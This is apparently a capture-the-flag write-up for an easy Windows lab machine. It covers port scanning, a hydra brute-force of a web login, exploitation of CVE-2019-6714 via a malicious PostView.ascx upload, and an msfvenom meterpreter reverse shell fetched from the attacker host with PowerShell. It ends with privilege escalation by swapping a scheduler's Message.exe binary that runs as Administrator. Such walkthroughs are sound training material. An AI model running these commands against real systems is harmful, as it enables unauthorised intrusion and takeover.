- OS: windows
- Difficulty: easy
- Author: talace
Scanning 👀
threader3000.py
1
2
| Port 80 is open
Port 3389 is open
|
Nmap scan
1
2
3
4
5
6
| nmap -p80,3389 -sV -sC -T4 -Pn -oA 10.10.229.26 10.10.229.26
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
3389/tcp open ssl/ms-wbt-server?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
|
Exploit ⚒️
Brute force w/ hydra
1
| hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.229.26 http-post-form "/Account/login.aspx?ReturnURL=%2fadmin%2f:__VIEWSTATE=HO0GkKGhqvanRz8QFeEDnNXtpYtrhxuJvR8jiXGCdzebR5ZKml6%2FQmm8Pr9IQ09Me06CBXD36YPshvECILNgSqaMd2cVEox7T6T%2BqPD%2FwGwQA%2B6ZdW1w8y7BMfNh3Hv9lMtLWs3hYIywZDzxnv7QUGn00fE0YVbK4UBIFNBG5QO0XLreqpuIKgC4Xstaaqfpd%2Bc4osXi0a6Dcox3qv3ZxW3XXpIDIdR85zru8zWcEBL30mwv9u64TXA8JBhN%2FCMQRNkiyWJMffQH%2FS0LK%2FX5cIraHf1kk%2BVtzdP2ruYPPDdz8YCrrKsibTMiWw6xQzKR3QIQdndxtyz94k6Q1cE90hAbH00F9OnMlWEbrmILfyga42Pg&__EVENTVALIDATION=j4urGc3uiZQ8Win7%2F%2F3uenmwf3nfBWF2r5tOm%2Fu6j5vvS0Sog7zxLA0VaodEtKzXPWYhE8AHdM%2BgtMbniCLTx2hQlp7NQPM89GbqrSf6WQSF%2B4BS8QHYzJRYrLSHcA4imlN%2BrIUS%2Beeq8ftqW5oAs7J4J2PSVcA5xE3ZFp0qr2zu03dm&ctl00%24MainContent%24LoginUser%24UserName=admin&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"
|
Enumeration of WebApp
I’m able to retrieve the version of the WebApp
With that i’ve found the CVE-2019-6714
Exploit of WebApp - [CVE-2019-6714]
First get access on a post Modify it and click on “add a file” Configure the LHOST and LPORT Put the payload in it with the name: PostView.ascx Open your listener to 4444 Access to the Path ”/?theme=../../App_Data/files”
Now that we got an access, let’s get a more stable one with msfvenom.
1. Generate our payload
1
| msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=10.8.138.226 LPORT=4444 -f exe > pwn.exe
|
2. Open a webserver with python
1
| python3 -m http.server 80
|
3. transfer the file into victime machine
1
| powershell -c "Invoke-WebRequest -Uri 'http://10.8.138.226:80/shell.exe' -OutFile 'C:\Program Files (x86)\SystemScheduler\Message.exe'"
|
1
2
3
4
5
6
7
| set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.10.10
set LPORT 4444
run
|
5. Now lunch the payload in the victime machine and get access to the machine!
Privilege escalation 👺
Find a interesting services
Let’s have a look at the log file
1
| cd c:\Program Files (x86)\SystemScheduler\Events
|
We found that the Message.exe is running as Administrator by this service. Let’s replace it and use it as our escalation 😼
1. Rename the file
1
| mv Message.exe Message.bak
|
2. Transfer my file and rename into Message.exe
powershell -c “Invoke-WebRequest -Uri ‘http://10.8.138.226:80/shell.exe’ -OutFile ‘C:\Program Files (x86)\SystemScheduler\Message.exe’”
3. Put my session meterpreter in background, run again the listener and wait…
Yes, we have our session! Now let’s retrieve some flag!
1
2
| cat C:\Users\jeff\Desktop\user.txt
cat C:\Users\Administrator\Desktop\root.txt
|